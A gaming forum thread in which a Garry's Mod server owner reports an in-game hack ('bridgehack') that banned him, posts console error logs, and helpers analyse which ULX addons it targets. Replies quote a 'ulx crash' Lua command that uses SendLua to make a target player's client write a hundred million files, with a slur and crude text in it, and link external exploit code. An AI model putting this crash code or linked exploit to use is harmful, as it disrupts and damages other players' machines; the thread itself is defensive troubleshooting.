ulx hackable or wtf

[[CG]Gamer::Lover]

hello today a guy joined my server and tried to hack it and he did he banned me perm lucky i just unbanned my self and banned him is there any way of stopping this

lucky for me the hack showed in console

 

Code: [Select]

[monstermod|7|STEAM_0:0:140794217] Lua Error:
 
[ERROR] lua/bridgehack.lua:124: Calling net.Start with unpooled message name! [http://goo.gl/qcx0y]
  1. Start - [C]:-1
   2. unknown - lua/bridgehack.lua:124
    3. unknown - lua/includes/modules/concommand.lua:54
 
 
[monstermod|7|STEAM_0:0:140794217] Lua Error:
 
[ERROR] lua/bridgehack.lua:2224: Calling net.Start with unpooled message name! [http://goo.gl/qcx0y]
  1. Start - [C]:-1
   2. DoClick - lua/bridgehack.lua:2224
    3. OnMouseReleased - lua/vgui/dlabel.lua:218
     4. unknown - lua/vgui/dmenuoption.lua:116
 
 
[monstermod|7|STEAM_0:0:140794217] Lua Error:
 
[ERROR] lua/bridgehack.lua:2184: Calling net.Start with unpooled message name! [http://goo.gl/qcx0y]
  1. Start - [C]:-1
   2. DoClick - lua/bridgehack.lua:2184
    3. OnMouseReleased - lua/vgui/dlabel.lua:218
     4. unknown - lua/vgui/dmenuoption.lua:116
 
 
[monstermod|7|STEAM_0:0:140794217] Lua Error:
 
[ERROR] lua/bridgehack.lua:2196: attempt to call global 'chatp' (a nil value)
  1. DoClick - lua/bridgehack.lua:2196
   2. OnMouseReleased - lua/vgui/dlabel.lua:218
    3. unknown - lua/vgui/dmenuoption.lua:116
 
 
[monstermod|7|STEAM_0:0:140794217] Lua Error:
 
[ERROR] lua/bridgehack.lua:2244: Calling net.Start with unpooled message name! [http://goo.gl/qcx0y]
  1. Start - [C]:-1
   2. DoClick - lua/bridgehack.lua:2244
    3. OnMouseReleased - lua/vgui/dlabel.lua:218
     4. unknown - lua/vgui/dmenuoption.lua:116
 
 
ServerLog: "CT 1933 Monstermod<7><STEAM_0:0:140794217><Clone Trooper>" say "gg"
 
[monstermod|7|STEAM_0:0:140794217] Lua Error:
 
[ERROR] lua/bridgehack.lua:2706: Calling net.Start with unpooled message name! [http://goo.gl/qcx0y]
  1. Start - [C]:-1
   2. DoClick - lua/bridgehack.lua:2706
    3. OnMouseReleased - lua/vgui/dlabel.lua:218
     4. unknown - lua/vgui/dmenuoption.lua:116
 
 
[monstermod|7|STEAM_0:0:140794217] Lua Error:
 
[ERROR] lua/bridgehack.lua:2590: Calling net.Start with unpooled message name! [http://goo.gl/qcx0y]
  1. Start - [C]:-1
   2. DoClick - lua/bridgehack.lua:2590
    3. OnMouseReleased - lua/vgui/dlabel.lua:218
     4. unknown - lua/vgui/dmenuoption.lua:116
 
 
[monstermod|7|STEAM_0:0:140794217] Lua Error:
 
[ERROR] lua/bridgehack.lua:2572: Calling net.Start with unpooled message name! [http://goo.gl/qcx0y]
  1. Start - [C]:-1
   2. DoClick - lua/bridgehack.lua:2572
    3. OnMouseReleased - lua/vgui/dlabel.lua:218
     4. unknown - lua/vgui/dmenuoption.lua:116
 
 
[monstermod|7|STEAM_0:0:140794217] Lua Error:
 
[ERROR] lua/bridgehack.lua:1628: Calling net.Start with unpooled message name! [http://goo.gl/qcx0y]
  1. Start - [C]:-1
   2. unknown - lua/bridgehack.lua:1628
    3. unknown - lua/includes/modules/concommand.lua:54


Gamer::Lover (STEAM_0:0:47063075)<77.213.186.55:50657> was kicked by ULib because they are on the ban list


(Console) unbanned steamid STEAM_0:0:47063075 (HaxRUs Rekt You)
ServerLog: [ULX] (Console) unbanned steamid STEAM_0:0:47063075 (HaxRUs Rekt You)



can anyody help with maby a protection script or did i just install something he hacked ?
 


 

[JamminR]

I see no indication of any ULX hack in those errors.
I'm not saying ULX can't be hacked, I'm simply saying those errors don't show it.

I searched Google for 'bridgehack lua' and the first response that comes up is "Leak Forums", a big site regarded widely across the Gmod community for not only including leaked pay scripts, but hacks, including exploits from the hackers that release the leaked paid scripts.

Found this for one of the bridge exploit code.
http://pastebin.com/raw/FPHcVQfn

I'm currently working from home, so don't have time to look through it deep.

[Stickly Man!]

Could you send us the full server logs from the day, as well as more console logs if you have them? We would like to look at the unedited logs to see if we can find any other useful information. You can send them to me via Private Message if you're worried about sensitive data.

[[CG]Gamer::Lover]

a guy helped me fix it it was in ulx extended can anybody help me fix it ?


THIS EXTENDED FILE IS HACKABLE

can anybody fix it if you have to take out a command its fine

[roastchicken]

Code: Lua

1. function ulx.crash(calling_ply, target_ply)
2.         target_ply:SendLua([[
3.                 file.CreateDir("faggot")
4.                 for i = 1,100000000 do
5.                 file.Write("faggot/umad"..i..".txt","i leik big dick hehheheh")
6.                 end
7.                 ]])
8. end
9. local crash = ulx.command("Extended", "ulx crash", ulx.crash)
10. crash:addParam{ type=ULib.cmds.PlayerArg }
11. crash:defaultAccess( ULib.ACCESS_SUPERADMIN )

well that's just lovely

[WispySkies]

Code: Lua

1. function ulx.crash(calling_ply, target_ply)
2.         target_ply:SendLua([[
3.                 file.CreateDir("faggot")
4.                 for i = 1,100000000 do
5.                 file.Write("faggot/umad"..i..".txt","i leik big dick hehheheh")
6.                 end
7.                 ]])
8. end
9. local crash = ulx.command("Extended", "ulx crash", ulx.crash)
10. crash:addParam{ type=ULib.cmds.PlayerArg }
11. crash:defaultAccess( ULib.ACCESS_SUPERADMIN )

well that's just lovely

This really made me laugh. Thanks for brightening my afternoon

[Megiddo]

I did a quick review of bridge hack. It is indeed an issue within a third-party ULX addon in this case.

For those interested, BridgeHack does target two things within ULX:
1. Ungag (only works in old ULX versions) -- Historically we had to implement user gagging on the client due to some Garry-bugs. Those were resolved so we now have the gagging logic server side; BridgeHack ungagging does not work against current ULX.
2. Downloading ULX logs from the server. I think this may also be a historical problem with requesting files from srcds, but I can't confirm since the source for this wasn't included in what JamminR posted. Regardless, this wouldn't be using a vulnerability in ULX, but a vulnerability in srcds.

[JamminR]

Looking further;
The code link I posted:

-attempts to grab more code from a pastebin link when it runs.
That link, which I presume contains more code exploit, no longer exists. It states removed.

- searches for several other addons, and prints to (Crackers?) console if they are found. They are as follows.
Hitman X
Hit Menu
BailNPC
DLOGS
MXRadio
VCMD
MDE
NLR
ULX Extended
If you have those addons, it's possible they have exploits.
However, just because you have them doesn't mean absolutely exploitable.
The bridgehack file I found is 1.3, and apparently, as Stickly Man points out, has some older code in it.
But who knows, those addons above may not have been updated in years like we keep ULib/ULX updated as much as possible.
Additionally, there might be a much newer version of the bridge hack I'm not aware of. Google may find more.